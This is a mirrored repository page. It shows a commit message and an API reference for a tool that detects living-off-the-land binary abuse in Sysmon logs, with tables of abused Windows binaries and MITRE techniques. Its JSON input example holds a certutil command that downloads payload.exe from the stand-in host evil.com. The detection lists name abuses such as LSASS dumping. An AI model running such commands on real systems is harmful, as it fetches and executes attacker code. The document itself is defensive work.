mirror of
https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git
synced 2026-07-16 20:55:17 +03:00
c47eed6a64
- Fix 25 shell=True subprocess calls with list-based commands - Fix 49 verify=False in defensive skills (env-var override) - Add timeout to 231 HTTP/subprocess/socket calls - Fix 6 SQL injection patterns with whitelist validation - Replace 8 __import__() with standard imports - Remove 701 unused imports across 442 files - Add authorized-testing disclaimers to all offensive skills - Complete 11 incomplete skill directories - Expand 10 stub SKILL.md files with full content - Fix 2 YAML parse errors in frontmatter - Fix 5 pre-existing syntax errors - Convert 22 hardcoded paths/ports to environment variables - Back up 21 redundant skill pairs to .bak - Fix 2 global declaration errors - 724/724 skills with full folder anatomy (SKILL.md + agent.py + api-reference.md + LICENSE) - 0 compile errors across all 724 agent.py files
3.1 KiB
3.1 KiB
API Reference: Detecting Living Off the Land Attacks
CLI Usage
# Analyze Sysmon EVTX file
python agent.py sysmon-events.evtx
# Analyze Sysmon JSON/JSONL export (one event per line)
python agent.py sysmon-events.jsonl
# Filter output for critical alerts
python agent.py sysmon-events.evtx 2>/dev/null | grep CRITICAL
LOLBins Detected
| Binary | MITRE Technique | Severity | Abuse Type |
|---|---|---|---|
| certutil.exe | T1218, T1105, T1140 | high | Download, decode, encode |
| mshta.exe | T1218.005 | high | Remote/inline script execution |
| rundll32.exe | T1218.011 | critical | JS execution, LSASS dump, DLL loading |
| regsvr32.exe | T1218.010 | critical | Squiblydoo scriptlet execution |
| bitsadmin.exe | T1197, T1105 | high | BITS download, job notification |
| wmic.exe | T1047 | high | Remote process creation, XSL processing |
| msbuild.exe | T1127.001 | high | Inline task execution from temp/AppData |
| installutil.exe | T1218.004 | high | Silent uninstall execution |
| cmstp.exe | T1218.003 | high | INF-based execution |
| mavinject.exe | T1218.013 | critical | DLL injection into running process |
| cscript.exe | T1059.005 | medium | Remote/suspicious script execution |
| wscript.exe | T1059.005 | medium | Remote/suspicious script execution |
Suspicious Parent-Child Pairs Detected
| Parent Process | Child Process | MITRE | Severity |
|---|---|---|---|
| winword/excel/outlook | cmd/powershell/mshta/certutil | T1204.002 | critical |
| wmiprvse.exe | cmd/powershell/mshta/rundll32 | T1047 | critical |
| services.exe | cmd/powershell/mshta/rundll32 | T1543.003 | high |
| svchost.exe | mshta/regsvr32/msbuild/certutil | T1218 | high |
Network-Suspicious LOLBins
LOLBins making outbound network connections are flagged as CRITICAL:
certutil.exe, mshta.exe, rundll32.exe, regsvr32.exe, msbuild.exe, installutil.exe, bitsadmin.exe, esentutl.exe, expand.exe, replace.exe, cmstp.exe
Input Formats
JSON Events Format
[
{
"Image": "C:\\Windows\\System32\\certutil.exe",
"CommandLine": "certutil -urlcache -f http://evil.com/payload.exe C:\\temp\\p.exe",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"User": "CORP\\jsmith",
"UtcTime": "2026-03-19 14:32:15.000",
"Computer": "WORKSTATION-01"
}
]
EVTX Requirements
Sysmon EVTX files with:
- Event ID 1 (Process Creation) with full command-line logging
- Event ID 3 (Network Connection) for LOLBin network detection
Report Output Schema
{
"report_date": "2026-03-19T12:00:00+00:00",
"total_findings": 15,
"by_severity": {"critical": 3, "high": 8, "medium": 4},
"by_lolbin": {"certutil.exe": 5, "rundll32.exe": 3, "mshta.exe": 2},
"mitre_techniques_observed": ["T1047", "T1105", "T1218", "T1218.005", "T1218.011"],
"findings": []
}
References
- LOLBAS Project: https://lolbas-project.github.io/
- MITRE ATT&CK Defense Evasion: https://attack.mitre.org/tactics/TA0005/
- Sysmon Documentation: https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon
- Sigma LOLBin Rules: https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation